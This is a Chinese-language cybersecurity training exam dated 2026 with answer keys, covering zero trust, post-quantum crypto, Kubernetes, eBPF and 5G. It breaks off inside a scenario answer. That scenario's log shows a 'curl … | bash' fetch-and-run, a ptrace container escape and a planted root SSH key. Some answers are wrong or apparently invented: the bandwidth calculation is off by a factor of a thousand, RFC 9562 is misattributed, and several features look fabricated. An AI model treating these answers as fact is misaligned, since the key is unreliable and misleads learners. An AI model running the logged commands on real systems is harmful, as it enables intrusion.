2026年网络安全安全培训试卷

2026年网络安全安全培训试卷一、单项选择题（每题2分，共30分）1.2026年1月，某企业发现其内部OA系统被植入Webshell，攻击者通过以下哪条HTTP请求头最可能隐藏了真实IP？A.X-Forwarded-For:B.User-Agent:Mozilla/5.0C.Accept-Language:zh-CND.Cache-Control:no-cache答案：A2.在零信任架构中，用于持续评估终端安全状态的协议是：A.RADIUSB.TACACS+C.PostureAssessmentProtocolD.SNMPv3答案：C3.某单位采用SM4-GCM算法加密数据库字段，若字段长度恰好为128bit，则密文长度（bit）为：A.128B.256C.384D.与IV长度无关答案：B4.2026年3月，Linux内核被曝出“StackRot”漏洞，其本质属于：A.内核竞态条件B.栈溢出C.页表孤立D.内存页回收逻辑缺陷答案：D5.某云函数（FunctionasaService）运行时，以下哪项配置最能缓解“冷启动攻击”？A.提高内存配额B.启用ProvisionedConcurrencyC.缩短超时时间D.使用容器镜像缓存答案：B6.在Windows1124H2中，启用VBS与CredentialGuard后，LSASS进程将：A.完全退出B.运行在虚拟信任级别（VTL1）C.被移入Hyper-V分区D.使用TPM2.0密封私钥答案：B7.某企业采用OAuth2.1授权码+PKCE模式，若授权服务器未校验code_challenge_method，可能导致：A.刷新令牌泄露B.授权码劫持C.CSRFD.重放攻击答案：B8.2026年5月，IETF发布RFC9562，将QUIC默认拥塞控制算法改为：A.CubicB.BBRv3C.RenoD.Copa答案：B9.某IDS规则alerttcpanyany->any443(msg:"TLS1.3ESNIDetected";content:"|0000010000|";)存在误报，最可能原因是：A.未考虑0-RTTB.匹配到EncryptedClientHello的固定魔术字C.未偏移到handshaketypeD.未区分UDP与TCP答案：C10.在Kubernetes1.32中，以下哪项AdmissionController可阻断latest标签镜像部署？A.PodSecurityB.ImagePolicyWebhookC.ResourceQuotaD.NamespaceLifecycle答案：B11.某芯片采用RISC-V架构，其PMP（PhysicalMemoryProtection）条目最多支持：A.8B.16C.32D.64答案：B12.2026年6月，NIST发布SP800-209r1，对后量子密钥封装机制要求最小安全等级为：A.NISTLevel1B.NISTLevel3C.NISTLevel5D.未指定答案：B13.某企业采用SASE架构，若POP节点遭受BGP劫持，以下哪项技术可最快收敛？A.RPKI+ROVB.BGPsecC.IRRD.ASPA答案：A14.在Android15中，针对零点击漏洞，系统新增的内存安全特性是：A.Scudo强化B.Rust重写libuiC.MTE（MemoryTaggingExtension）默认开启D.ShadowCallStack答案：C15.某单位使用GitLab17.0，若启用OIDCSSO后仍允许账号密码登录，管理员应关闭：A.OmniAuthB.LDAP同步C.StandardauthenticationD.PAT答案：C二、多项选择题（每题3分，共30分；多选少选均不得分）16.以下哪些属于2026年MITREATT&CKv16新增的ICS技术？A.ProgramDownloadB.ControllerPinControlC.RoleIdentificationD.SerialConnectionEnumeration答案：ABD17.关于SM9标识密码算法，下列描述正确的是：A.基于椭圆曲线双线性对B.密钥生成中心（KGC）可离线C.支持密钥escrowD.加密流程无需配对运算答案：AC18.在零信任网络中，以下哪些信号可用于动态信任评分？A.设备证书有效期B.用户行为基线偏差C.微隔离策略版本D.地理位置变化答案：ABD19.某企业采用eBPF实现网络审计，以下哪些钩子点可用于捕获出站DNS？A.tcegressB.tracepoint/syscalls/sys_enter_sendtoC.kprobe/udp_sendmsgD.kretprobe/tcp_connect答案：ABC20.针对AI供应链攻击，以下哪些措施可有效降低模型投毒风险？A.模型签名验证B.训练数据哈希白名单C.差分隐私训练D.多机构联合审计答案：ABD21.2026年7月，某APT组织使用“Living-off-the-Land”手法，以下哪些工具可被滥用？A.certutilB.mshtaC.dotnet-dumpD.wmic答案：ABCD22.在量子密钥分发（QKD）中，以下哪些属于对实际系统的侧信道攻击？A.强光致盲B.时序分析C.相位重映射D.光子数分离答案：ABC23.某云原生平台使用OPAGatekeeper，以下哪些ConstraintTemplate可用于限制容器以root身份运行？A.K8sPSPCapabilitiesB.K8sPSPRunAsUserC.K8sPSPSELinuxD.K8sPSPAllowedUsers答案：BD24.关于5G-Advanced网络切片安全，以下说法正确的是：A.切片间共享RRC密钥B.支持切片特定根密钥推导C.NSSF可拒绝非授权切片选择D.UE需支持SUCI隐藏答案：BCD25.某企业采用confidentialcomputing（TEE）运行AI推理，以下哪些攻击面仍存？A.侧信道（cachetiming）B.内存总线嗅探C.供应链恶意固件D.回滚攻击答案：ACD三、判断题（每题1分，共10分；正确打“√”，错误打“×”）26.2026年起，欧盟NIS2指令要求关键服务供应商在24小时内向CSIRT报告重大事件。答案：√27.Windows1124H2默认禁用SMBv1，但允许管理员通过组策略重新启用。答案：√28.RISC-V的Zkt扩展用于提供恒定时间指令，可抵抗时序侧信道。答案：√29.在TLS1.3中，证书压缩消息必须在EncryptedExtensions之后发送。答案：×30.后量子算法Kyber的公钥尺寸大于私钥尺寸。答案：√31.Kubernetes的ServiceAccountToken在v1.32中默认采用可自动续期的BoundToken。答案：√32.2026年发布的FIDO2L3认证要求生物特征模板必须存储于TEE中。答案：√33.QUIC的Version2将强制使用长包头，以兼容中间件。答案：×34.在Linux内核中，启用CFI（ControlFlowIntegrity）后，retbleed攻击仍可利用返回指令。答案：×35.5G核心网中，AUSF与UDM之间的接口为Nudm-UEAuthentication，采用HTTPS双向认证。答案：√四、填空题（每空2分，共20分）36.2026年，NIST后量子标准算法中，用于数字签名的________算法基于结构化格，公钥尺寸最小。答案：Dilithium37.在eBPF程序中，用于获取当前进程PID的内核辅助函数为________。答案：bpf_get_current_pid_tgid38.Android15新增的“________”特性，可对原生库执行动态重定位随机化。答案：RelroRando39.某企业采用SM2签名，若签名结果（r,s）出现r=0，依据GM/T0003.2-2026应直接________。答案：拒绝并重新生成40.在Kubernetes中，NetworkPolicy的policyTypes字段若未显式声明，则默认仅________方向。答案：Ingress41.2026年，IETF将HTTP/3的QPACK静态表扩展至________条。答案：9942.Windows1124H2的“________”功能，可在内核层拦截利用LoadLibrary的DLL注入。答案：KernelCET43.在RISC-VPMP中，每条配置寄存器pmpcfgX的地址匹配模式字段占________位。答案：244.5G-Advanced引入的“________”机制，可在UE侧对切片密钥进行预推导，降低认证时延。答案：EAP-TLS-PSK45.某单位使用GitOps，ArgoCD在检测到ApplicationSet生成________个Application后触发同步。答案：1五、简答题（每题10分，共30分）46.简述2026年主流“后量子混合密钥交换”在TLS1.3中的握手流程变化，并说明为何需要“混合”模式。答案：（1）变化：ClientHello扩展中同时携带传统（X25519）与后量子（Kyber1024）公钥，服务器在EncryptedExtensions中返回双份密文；（2）密钥导出：通过TLS1.3KDF将两组共享秘密按concat(X25519-KEM||Kyber-KEM)输入，再提取主密钥；（3）原因：后量子算法尚未经历长期密码分析，混合可保证即使一方被破解，会话密钥仍安全；同时兼容现有中间件，实现渐进迁移。47.某企业采用微隔离（Micro-Segmentation）保护数据中心，请给出基于eBPF的实现框架，并说明如何防御“容器逃逸+横向移动”组合攻击。答案：框架：1.利用eBPF程序挂载于cgroup/connect、tcp_v4_connect等钩子，实时获取进程、容器ID、Pod标签；2.用户态Daemon维护标签到策略的映射，通过BPFMap下发至内核；3.对每条流执行“五元组+标签”匹配，未命中则默认拒绝；防御：a.逃逸检测：在security_bprm_check钩子校验进程二进制路径，若出现/host、/proc/self等敏感挂载命名空间，立即触发告警并隔离；b.横向移动：利用BPF程序记录短-livedsocket，结合行为基线，若发现异常端口扫描（SYN≥10/s且失败率>80%），动态下发临时策略阻断源IP300s；c.审计：所有策略命中日志通过PerfEventRingBuffer送至SIEM，保留180天。48.说明2026年新版《个人信息出境标准合同办法》对“数据映射表”的技术要求，并给出企业落地步骤。答案：技术要求：1.需逐字段标注个人信息类别、敏感级别、出境目的、接收方所在国家、加密算法与密钥长度、删除期限；2.支持自动化抽取，误差率≤0.5%；3.与出境流量日志关联，做到字段级血缘追踪；落地步骤：Step1：部署数据发现工具（基于ML分类），对DB、对象存储、大数据平台扫描，生成初版映射表；Step2：引入数据血缘引擎，解析ETL、API调用链，补充字段上下游关系；Step3：通过API网关插件实时打标签，将流量日志与映射表关联，形成“字段-出境记录”对；Step4：每季度由DPO复核，变更部分需重新评估并备案；Step5：在标准合同附件中导出CSV与JSON双格式，供网信部门抽检。六、综合计算题（共20分）49.某企业计划部署后量子VPN网关，采用Kyber1024+Dilithium5混合算法。已知：Kyber1024密文长度1568B，公钥1568B，私钥3168B；Dilithium5签名长度4595B，公钥2592B，私钥4864B；每小时平均新建握手8000次；网关内存预算单核1GB，网络出口带宽1Gbps；求：（1）每小时仅考虑握手流量，共消耗出站带宽多少Mbps？（保留2位小数）（2）若网关采用预生成证书模式，将私钥提前加载至内存，计算单核最多可缓存多少套完整密钥对而不超过85%内存？答案与解析：（1）单次握手出站数据=Kyber公钥+Kyber密文+Dilithium签名+Dilithium公钥=1568+1568+4595+2592=10323B每小时总流量=8000×10323B=82,584,000B换算比特=82,584,000×8=660,672,000bit时间=3600s带宽=660,672,000/3600≈183.52Mbps（2）单套密钥内存=Kyber私钥+Dilithium私钥=3168+4864=8032B可用内存=1GB×85%=0.85GB=0.85×1024³≈912,680,550B套数=912,680,550/8032≈113,632套七、场景分析题（共30分）50.阅读下列2026年真实攻击链复现日志，回答问题：【日志片段】2026-08-03T14:17:02.115Zpod=frontend-7d9c8f6b9-xvw2knamespace=webcmd=“/bin/sh-c‘curl-s/pk|bash’”2026-08-03T14:17:02.398Zsyscall=ptraceret=02026-08-03T14:17:02.401Znetwork=TCPdst=:443len=517SNI=2026-08-03T14:17:02.810Zfile=/proc/1/root/.ssh/authorized_keysmode=0644uid=02026-08-03T14:17:03.005Zprocess=“/tmp/.k3s/echo-pty”pid=1337ppid=1问题：（1）请按时间顺序还原攻击链，并指出每一步利用的漏洞或配置缺陷；（2）给出针对该链的“左移+右移”联合防护方案，需包含代码或配置示例。答案与解析：（1）还原：①前端Pod存在命令注入，通过curl下载远程shell脚本；②脚本利用容器未禁用ptrace，附加到PID1，实现容器逃逸；③逃逸后，攻击者将公钥写入宿主机/root/.ssh/authorized_keys，建立持久化；④通